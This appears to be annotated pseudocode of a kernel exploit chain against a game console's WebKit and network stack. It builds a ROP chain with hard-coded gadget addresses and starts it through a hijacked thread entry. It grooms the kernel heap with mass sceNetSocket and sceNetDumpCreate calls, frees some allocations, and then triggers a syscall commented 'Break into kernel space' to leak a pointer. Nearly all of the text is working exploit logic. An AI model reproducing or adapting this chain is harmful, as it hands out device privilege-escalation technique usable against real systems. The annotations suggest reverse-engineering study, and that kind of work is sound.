// Create "mhm" thread // "mhm" == "move heap memory"? // Entry (0x000054C8): LDMIA R1, {R1,R2,R4,R8,R11,SP,PC} int thread_id = sceKernelCreateThread("mhm", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

// Store "mhm" thread's ID 0x00(x_stack + 0x00008620) = thread_id

// Store SceKernelThreadInfo size 0x00(x_stack + 0x0000862C) = 0x0000007C

// Get "mhm" thread's info structure sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);

// Store mhm_threadinfo.stack + 0x00001000 0x00(x_stack + 0x000086FC) = 0x00(x_stack + 0x00008660) + 0x00001000

// Spam sceNetSocket requests // sceNetSocket("x", AF_INET, SOCK_STREAM, 0); 0x00(x_stack + 0x00008470) = sceNetSocket(x_stack + 0x00010388, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008474) = sceNetSocket(x_stack + 0x00010390, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008478) = sceNetSocket(x_stack + 0x00010398, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000847C) = sceNetSocket(x_stack + 0x000103A0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008480) = sceNetSocket(x_stack + 0x000103A8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008484) = sceNetSocket(x_stack + 0x000103B0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008488) = sceNetSocket(x_stack + 0x000103B8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000848C) = sceNetSocket(x_stack + 0x000103C0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008490) = sceNetSocket(x_stack + 0x000103C8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008494) = sceNetSocket(x_stack + 0x000103D0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008498) = sceNetSocket(x_stack + 0x000103D8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000849C) = sceNetSocket(x_stack + 0x000103E0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084A0) = sceNetSocket(x_stack + 0x000103E8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084A4) = sceNetSocket(x_stack + 0x000103F0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084A8) = sceNetSocket(x_stack + 0x000103F8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084AC) = sceNetSocket(x_stack + 0x00010400, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084B0) = sceNetSocket(x_stack + 0x00010408, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084B4) = sceNetSocket(x_stack + 0x00010410, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084B8) = sceNetSocket(x_stack + 0x00010418, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084BC) = sceNetSocket(x_stack + 0x00010420, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084C0) = sceNetSocket(x_stack + 0x00010428, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084C4) = sceNetSocket(x_stack + 0x00010430, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084C8) = sceNetSocket(x_stack + 0x00010438, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084CC) = sceNetSocket(x_stack + 0x00010440, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084D0) = sceNetSocket(x_stack + 0x00010448, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084D4) = sceNetSocket(x_stack + 0x00010450, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084D8) = sceNetSocket(x_stack + 0x00010458, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084DC) = sceNetSocket(x_stack + 0x00010460, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084E0) = sceNetSocket(x_stack + 0x00010468, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084E4) = sceNetSocket(x_stack + 0x00010470, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084E8) = sceNetSocket(x_stack + 0x00010478, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084EC) = sceNetSocket(x_stack + 0x00010480, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084F0) = sceNetSocket(x_stack + 0x00010488, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084F4) = sceNetSocket(x_stack + 0x00010490, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084F8) = sceNetSocket(x_stack + 0x00010498, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000084FC) = sceNetSocket(x_stack + 0x000104A0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008500) = sceNetSocket(x_stack + 0x000104A8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008504) = sceNetSocket(x_stack + 0x000104B0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008508) = sceNetSocket(x_stack + 0x000104B8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000850C) = sceNetSocket(x_stack + 0x000104C0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008510) = sceNetSocket(x_stack + 0x000104C8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008514) = sceNetSocket(x_stack + 0x000104D0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008518) = sceNetSocket(x_stack + 0x000104D8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000851C) = sceNetSocket(x_stack + 0x000104E0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008520) = sceNetSocket(x_stack + 0x000104E8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008524) = sceNetSocket(x_stack + 0x000104F0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008528) = sceNetSocket(x_stack + 0x000104F8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000852C) = sceNetSocket(x_stack + 0x00010500, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008530) = sceNetSocket(x_stack + 0x00010508, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008534) = sceNetSocket(x_stack + 0x00010510, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008538) = sceNetSocket(x_stack + 0x00010518, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000853C) = sceNetSocket(x_stack + 0x00010520, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008540) = sceNetSocket(x_stack + 0x00010528, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008544) = sceNetSocket(x_stack + 0x00010530, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008548) = sceNetSocket(x_stack + 0x00010538, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000854C) = sceNetSocket(x_stack + 0x00010540, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008550) = sceNetSocket(x_stack + 0x00010548, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008554) = sceNetSocket(x_stack + 0x00010550, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008558) = sceNetSocket(x_stack + 0x00010558, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000855C) = sceNetSocket(x_stack + 0x00010560, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008560) = sceNetSocket(x_stack + 0x00010568, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008564) = sceNetSocket(x_stack + 0x00010570, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008568) = sceNetSocket(x_stack + 0x00010578, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000856C) = sceNetSocket(x_stack + 0x00010580, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008570) = sceNetSocket(x_stack + 0x00010588, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008574) = sceNetSocket(x_stack + 0x00010590, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008578) = sceNetSocket(x_stack + 0x00010598, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000857C) = sceNetSocket(x_stack + 0x000105A0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008580) = sceNetSocket(x_stack + 0x000105A8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008584) = sceNetSocket(x_stack + 0x000105B0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008588) = sceNetSocket(x_stack + 0x000105B8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000858C) = sceNetSocket(x_stack + 0x000105C0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008590) = sceNetSocket(x_stack + 0x000105C8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008594) = sceNetSocket(x_stack + 0x000105D0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x00008598) = sceNetSocket(x_stack + 0x000105D8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x0000859C) = sceNetSocket(x_stack + 0x000105E0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000085A0) = sceNetSocket(x_stack + 0x000105E8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000085A4) = sceNetSocket(x_stack + 0x000105F0, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000085A8) = sceNetSocket(x_stack + 0x000105F8, 0x00000002, 0x00000001, 0x00000000); 0x00(x_stack + 0x000085AC) = sceNetSocket(x_stack + 0x00010600, 0x00000002, 0x00000001, 0x00000000);

// sceNetSocket("sss", AF_INET, SOCK_STREAM, 0); 0x00(x_stack + 0x000085B8) = sceNetSocket(x_stack + 0x00010608, 0x00000002, 0x00000001, 0x00000000);

// sceNetSocket("tst", AF_INET, 0x7, 0); 0x00(x_stack + 0x000085C4) = sceNetSocket(x_stack + 0x00010614, 0x00000002, 0x00000007, 0x00000000);

// Setup "mhm" ROP 0x00(x_stack + 0x00008708) = 0x008DD9B5 0x00(x_stack + 0x0000870C) = 0x000085C4 0x00(x_stack + 0x00008710) = 0x10007300 0x00(x_stack + 0x00008714) = 0x00000000 0x00(x_stack + 0x00008718) = 0x00000000 0x00(x_stack + 0x0000871C) = 0x00009F90 0x00(x_stack + 0x00008720) = 0x00000000 0x00(x_stack + 0x00008724) = 0x000FCDBB 0x00(x_stack + 0x00008728) = 0x00008810 0x00(x_stack + 0x0000872C) = 0x000059A9 0x00(x_stack + 0x00008730) = 0x00000000 0x00(x_stack + 0x00008734) = 0x00000519

/* "mhm" ROP

// Issue an IOCtl to "tst" FD int ioctl_res = sceNetSyscallIoctl(x_stack + 0x000085C4, 0x10007300, 0x00000000);

// Store IOCtl result 0x00(x_stack + 0x00008810) = ioctl_res;

// Deadlock sceWebkit_519();

  • /

// Copy "mhm" ROP chain into "mhm" thread's stack memcpy(0x00(x_stack + 0x000086FC), x_stack + 0x00008708, 0x00000100);

// Set stack pointer 0x00(x_stack + 0x00008830) = x_stack + 0x000086FC;

// Set PC 0x00(x_stack + 0x00008834) = 0x000C048B; // POP {PC}

// sceNetSocket("tmp", AF_INET, SOCK_STREAM, 0); 0x00(x_stack + 0x000085D0) = sceNetSocket(x_stack + 0x00010620, 0x00000002, 0x00000001, 0x00000000);

// Create several net dumps // sceNetDumpCreate("ddd", 0x00000F00, 0x00000000); 0x00(x_stack + 0x000085F4) = sceNetDumpCreate(x_stack + 0x0001062C, 0x00000F00, 0x00000000); 0x00(x_stack + 0x000085F8) = sceNetDumpCreate(x_stack + 0x00010638, 0x00000F00, 0x00000000); 0x00(x_stack + 0x000085FC) = sceNetDumpCreate(x_stack + 0x00010644, 0x00000F00, 0x00000000); 0x00(x_stack + 0x00008600) = sceNetDumpCreate(x_stack + 0x00010650, 0x00000F00, 0x00000000); 0x00(x_stack + 0x00008604) = sceNetDumpCreate(x_stack + 0x0001065C, 0x00000F00, 0x00000000); 0x00(x_stack + 0x00008608) = sceNetDumpCreate(x_stack + 0x00010668, 0x00000F00, 0x00000000); 0x00(x_stack + 0x0000860C) = sceNetDumpCreate(x_stack + 0x00010674, 0x00000F00, 0x00000000); 0x00(x_stack + 0x00008610) = sceNetDumpCreate(x_stack + 0x00010680, 0x00000F00, 0x00000000); 0x00(x_stack + 0x00008614) = sceNetDumpCreate(x_stack + 0x0001068C, 0x00000F00, 0x00000000); 0x00(x_stack + 0x000085E8) = sceNetDumpCreate(x_stack + 0x00010698, 0x00000F00, 0x00000000); 0x00(x_stack + 0x000085DC) = sceNetDumpCreate(x_stack + 0x000106A4, 0x00001000, 0x00000000);

// Destroy some dumps sceNetDumpDestroy(x_stack + 0x000085F4); sceNetDumpDestroy(x_stack + 0x000085FC); sceNetDumpDestroy(x_stack + 0x00008604); sceNetDumpDestroy(x_stack + 0x0000860C); sceNetDumpDestroy(x_stack + 0x00008614); sceNetDumpDestroy(x_stack + 0x000085E8);

// Create more net dumps sceNetDumpCreate(x_stack + 0x000106B0, 0x000D0000, 0x00000000); sceNetDumpCreate(x_stack + 0x000106BC, 0x000CFF00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106C8, 0x000CFE00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106D4, 0x000CFD00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106E0, 0x000CFC00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106EC, 0x000CFB00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106F8, 0x000CFA00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010704, 0x000CF900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010710, 0x000CF800, 0x00000000); sceNetDumpCreate(x_stack + 0x0001071C, 0x000CF700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010728, 0x000CF600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010734, 0x000CF500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010740, 0x000CF400, 0x00000000); sceNetDumpCreate(x_stack + 0x0001074C, 0x000CF300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010758, 0x000CF200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010764, 0x000CF100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010770, 0x000CF000, 0x00000000); sceNetDumpCreate(x_stack + 0x0001077C, 0x000CEF00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010788, 0x000CEE00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010794, 0x000CED00, 0x00000000); sceNetDumpCreate(x_stack + 0x000107A0, 0x000CEC00, 0x00000000); sceNetDumpCreate(x_stack + 0x000107AC, 0x000CEB00, 0x00000000); sceNetDumpCreate(x_stack + 0x000107B8, 0x000CEA00, 0x00000000); sceNetDumpCreate(x_stack + 0x000107C4, 0x000CE900, 0x00000000); sceNetDumpCreate(x_stack + 0x000107D0, 0x000CE800, 0x00000000); sceNetDumpCreate(x_stack + 0x000107DC, 0x000CE700, 0x00000000); sceNetDumpCreate(x_stack + 0x000107E8, 0x000CE600, 0x00000000); sceNetDumpCreate(x_stack + 0x000107F4, 0x000CE500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010800, 0x000CE400, 0x00000000); sceNetDumpCreate(x_stack + 0x0001080C, 0x000CE300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010818, 0x000CE200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010824, 0x000CE100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010830, 0x000CE000, 0x00000000); sceNetDumpCreate(x_stack + 0x0001083C, 0x000CDF00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010848, 0x000CDE00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010854, 0x000CDD00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010860, 0x000CDC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0001086C, 0x000CDB00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010878, 0x000CDA00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010884, 0x000CD900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010890, 0x000CD800, 0x00000000); sceNetDumpCreate(x_stack + 0x0001089C, 0x000CD700, 0x00000000); sceNetDumpCreate(x_stack + 0x000108A8, 0x000CD600, 0x00000000); sceNetDumpCreate(x_stack + 0x000108B4, 0x000CD500, 0x00000000); sceNetDumpCreate(x_stack + 0x000108C0, 0x000CD400, 0x00000000); sceNetDumpCreate(x_stack + 0x000108CC, 0x000CD300, 0x00000000); sceNetDumpCreate(x_stack + 0x000108D8, 0x000CD200, 0x00000000); sceNetDumpCreate(x_stack + 0x000108E4, 0x000CD100, 0x00000000); sceNetDumpCreate(x_stack + 0x000108F0, 0x000CD000, 0x00000000); sceNetDumpCreate(x_stack + 0x000108FC, 0x000CCF00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010908, 0x000CCE00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010914, 0x000CCD00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010920, 0x000CCC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0001092C, 0x000CCB00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010938, 0x000CCA00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010944, 0x000CC900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010950, 0x000CC800, 0x00000000); sceNetDumpCreate(x_stack + 0x0001095C, 0x000CC700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010968, 0x000CC600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010974, 0x000CC500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010980, 0x000CC400, 0x00000000); sceNetDumpCreate(x_stack + 0x0001098C, 0x000CC300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010998, 0x000CC200, 0x00000000); sceNetDumpCreate(x_stack + 0x000109A4, 0x000CC100, 0x00000000); sceNetDumpCreate(x_stack + 0x000109B0, 0x000CC000, 0x00000000); sceNetDumpCreate(x_stack + 0x000109BC, 0x000CBF00, 0x00000000); sceNetDumpCreate(x_stack + 0x000109C8, 0x000CBE00, 0x00000000); sceNetDumpCreate(x_stack + 0x000109D4, 0x000CBD00, 0x00000000); sceNetDumpCreate(x_stack + 0x000109E0, 0x000CBC00, 0x00000000); sceNetDumpCreate(x_stack + 0x000109EC, 0x000CBB00, 0x00000000); sceNetDumpCreate(x_stack + 0x000109F8, 0x000CBA00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A04, 0x000CB900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A10, 0x000CB800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A1C, 0x000CB700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A28, 0x000CB600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A34, 0x000CB500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A40, 0x000CB400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A4C, 0x000CB300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A58, 0x000CB200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A64, 0x000CB100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A70, 0x000CB000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A7C, 0x000CAF00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A88, 0x000CAE00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010A94, 0x000CAD00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AA0, 0x000CAC00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AAC, 0x000CAB00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AB8, 0x000CAA00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AC4, 0x000CA900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AD0, 0x000CA800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010ADC, 0x000CA700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AE8, 0x000CA600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010AF4, 0x000CA500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B00, 0x000CA400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B0C, 0x000CA300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B18, 0x000CA200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B24, 0x000CA100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B30, 0x000CA000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B3C, 0x000C9F00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B48, 0x000C9E00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B54, 0x000C9D00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B60, 0x000C9C00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B6C, 0x000C9B00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B78, 0x000C9A00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B84, 0x000C9900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B90, 0x000C9800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010B9C, 0x000C9700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BA8, 0x000C9600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BB4, 0x000C9500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BC0, 0x000C9400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BCC, 0x000C9300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BD8, 0x000C9200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BE4, 0x000C9100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BF0, 0x000C9000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010BFC, 0x000C8F00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C08, 0x000C8E00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C14, 0x000C8D00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C20, 0x000C8C00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C2C, 0x000C8B00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C38, 0x000C8A00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C44, 0x000C8900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C50, 0x000C8800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C5C, 0x000C8700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C68, 0x000C8600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C74, 0x000C8500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C80, 0x000C8400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C8C, 0x000C8300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010C98, 0x000C8200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CA4, 0x000C8100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CB0, 0x000C8000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CBC, 0x000C7F00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CC8, 0x000C7E00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CD4, 0x000C7D00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CE0, 0x000C7C00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CEC, 0x000C7B00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010CF8, 0x000C7A00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D04, 0x000C7900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D10, 0x000C7800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D1C, 0x000C7700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D28, 0x000C7600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D34, 0x000C7500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D40, 0x000C7400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D4C, 0x000C7300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D58, 0x000C7200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D64, 0x000C7100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D70, 0x000C7000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D7C, 0x000C6F00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D88, 0x000C6E00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010D94, 0x000C6D00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DA0, 0x000C6C00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DAC, 0x000C6B00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DB8, 0x000C6A00, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DC4, 0x000C6900, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DD0, 0x000C6800, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DDC, 0x000C6700, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DE8, 0x000C6600, 0x00000000); sceNetDumpCreate(x_stack + 0x00010DF4, 0x000C6500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E00, 0x000C6400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E0C, 0x000C6300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E18, 0x000C6200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E24, 0x000C6100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E30, 0x000C6000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E3C, 0x00001000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E48, 0x00001000, 0x00000000);

// Start "mhm" thread // Thread arguments are loaded into R1 and the gadget // at the thread's entrypoint then loads register values // from it, overwritting SP and PC and triggering the // ROP chain sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);

// Delay thread sceKernelDelayThread(1500000);

// Close no longer needed sockets sceNetSyscallClose(x_stack + 0x00008470); sceNetSyscallClose(x_stack + 0x00008478); sceNetSyscallClose(x_stack + 0x00008480); sceNetSyscallClose(x_stack + 0x00008488); sceNetSyscallClose(x_stack + 0x00008490); sceNetSyscallClose(x_stack + 0x00008498); sceNetSyscallClose(x_stack + 0x000084A0); sceNetSyscallClose(x_stack + 0x000084A8); sceNetSyscallClose(x_stack + 0x000084B0); sceNetSyscallClose(x_stack + 0x000084B8); sceNetSyscallClose(x_stack + 0x000084C0); sceNetSyscallClose(x_stack + 0x000084C8); sceNetSyscallClose(x_stack + 0x000084D0); sceNetSyscallClose(x_stack + 0x000084D8); sceNetSyscallClose(x_stack + 0x000084E0); sceNetSyscallClose(x_stack + 0x000084E8); sceNetSyscallClose(x_stack + 0x000084F0); sceNetSyscallClose(x_stack + 0x000084F8); sceNetSyscallClose(x_stack + 0x00008500); sceNetSyscallClose(x_stack + 0x00008508); sceNetSyscallClose(x_stack + 0x00008510); sceNetSyscallClose(x_stack + 0x00008518); sceNetSyscallClose(x_stack + 0x00008520); sceNetSyscallClose(x_stack + 0x00008528); sceNetSyscallClose(x_stack + 0x00008530); sceNetSyscallClose(x_stack + 0x00008538); sceNetSyscallClose(x_stack + 0x00008540); sceNetSyscallClose(x_stack + 0x00008548); sceNetSyscallClose(x_stack + 0x00008550); sceNetSyscallClose(x_stack + 0x00008558); sceNetSyscallClose(x_stack + 0x00008560); sceNetSyscallClose(x_stack + 0x00008568); sceNetSyscallClose(x_stack + 0x00008570); sceNetSyscallClose(x_stack + 0x00008578); sceNetSyscallClose(x_stack + 0x00008580); sceNetSyscallClose(x_stack + 0x00008588); sceNetSyscallClose(x_stack + 0x00008590); sceNetSyscallClose(x_stack + 0x00008598); sceNetSyscallClose(x_stack + 0x000085A0); sceNetSyscallClose(x_stack + 0x000085A8); sceNetSyscallClose(x_stack + 0x000085C4);

// Break into kernel space sceNetSyscallControl(0x00000000, 0x30000000, x_stack + 0x00008840, 0x000000FC);

// Destroy another dump sceNetDumpDestroy(x_stack + 0x000085DC);

// Delay for a while sceKernelDelayThread(1000000);

// Calculate a SceWebkit pointer using the ioctl // from "mhm" thread (kernel space?) r0 = 0x00(x_stack + 0x00008810) + SceWebkit_base + 0x00000575;

// Unknown sceWebkit_123(); sceWebkit_CF481();

